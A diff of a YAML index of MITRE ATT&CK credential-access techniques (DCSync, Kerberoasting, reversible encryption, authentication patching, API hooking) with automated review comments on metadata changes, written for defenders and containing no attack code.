- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
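Review bot: `spec_version: '2.1'` is removed for T1555.004 here, and for the other techniques throughout this diff, with no replacement; if any consumer of this index filters or validates on the STIX `spec_version`, that field is now gone, so it merits a line in the PR description. The removal of the T1556.001 header block (`id`, `type`, `created`, `external_references`) at the bottom of the hunk is only a move; the same values reappear further down.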
@@ -48146,6 +48853,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -48160,52 +48868,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
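Review bot: `x_mitre_permissions_required` (`Administrator`) is dropped for T1556.001, `revoked: false` is added, and the technique version moves from '2.0' to '2.1'; the field removal is consistent with the rest of this diff but should be called out for anyone using the index to filter by required privilege. Neither the old nor the new T1556.001 block carries an `identifier:` line before `atomic_tests: []`, unlike T1003.008, T1558.002 and T1555.004 above; since the block is rewritten wholesale here, this is a good opportunity to make that consistent.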
@@ -48227,6 +48925,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -48237,23 +48936,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
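Review bot: T1556.005 loses `x_mitre_permissions_required` (`User`, `Administrator`) and moves from version '1.0' to '1.1'; the `external_references` list is also reordered (`dump_pwd_dcsync` now precedes `store_pwd_rev_enc`), which hides the fact that no reference content actually changed. As with T1556.001, the block still has no `identifier:` line before `atomic_tests: []`. The stray line breaks around `Set-ADUser` and `Set-ADAccountControl` in the `x_mitre_detection` context are pre-existing and belong with the same sanitiser fix noted above.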
@@ -48324,9 +49050,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -48385,12 +49110,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests: []
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
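Review bot: T1003.003 keeps `x_mitre_attack_spec_version: 3.1.0` (context line) while its `spec_version: '2.1'` is removed, so it is the one technique in this region that does not move to 3.2.0; that is plausible if the upstream object was not touched in this release, but worth confirming it is not a stale copy. The T1558.003 `modified` bump to 2024-09-23 matches the reference updates further down.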
@@ -48422,6 +49146,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -48431,7 +49156,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -48443,111 +49167,49 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests: []
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
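Review bot: the Harmj0y Kerberoast reference for T1558.003 is updated to `https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/` with a new retrieval date (September 23, 2024), and `x_mitre_modified_by_ref` is re-added after `x_mitre_attack_spec_version: 3.2.0`; both look right. The large removal of the T1003.006 header block at the end of this hunk is a move rather than a loss: the same `id`, `created` and references are re-added in the following hunk, so compare the two reference lists rather than treating the deletion as dropped data.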
@@ -48558,26 +49220,88 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
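Review bot: the rebuilt T1003.006 `external_references` list contains two pairs of entries for the same source: `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` both point at `https://adsecurity.org/?p=1729`, and `Harmj0y DCSync Sept 2015` / `Harmj0y Mimikatz and DCSync` are the same post, now at two different hosts (`http://www.harmj0y.net/blog/redteaming/...` versus `https://blog.harmj0y.net/redteaming/...`). Since the upstream object defines both `source_name`s, this index simply mirrors it and nothing should be changed here, but the diverging hosts are worth flagging upstream. `x_mitre_permissions_required` (`Administrator`) is dropped here as elsewhere in the diff.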
@@ -48590,6 +49314,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -48626,17 +49351,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
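Review bot: the T1556 platform list drops `Azure AD`, `Google Workspace` and `Office 365` and adds `Office Suite` and `Identity Provider` (version '2.4' to '2.5'); anything keyed on the old platform strings, including any platform-specific index derived from this file, will stop listing T1556 unless it is updated to the new names, so please confirm those derived outputs are regenerated in the same change.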
@@ -48682,81 +49407,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
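Review bot: for T1556, `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are removed at the end of the block, but both are re-added earlier in the same block in the two preceding hunks, so only `spec_version: '2.1'` is actually lost; the T1056.004 header removal (`id`, `created`, `external_references`) is likewise a move, with the same values re-added in the next hunk. As with T1556.001 and T1556.005, the T1556 block has no `identifier:` line before `atomic_tests: []`.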
@@ -48769,28 +49423,94 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
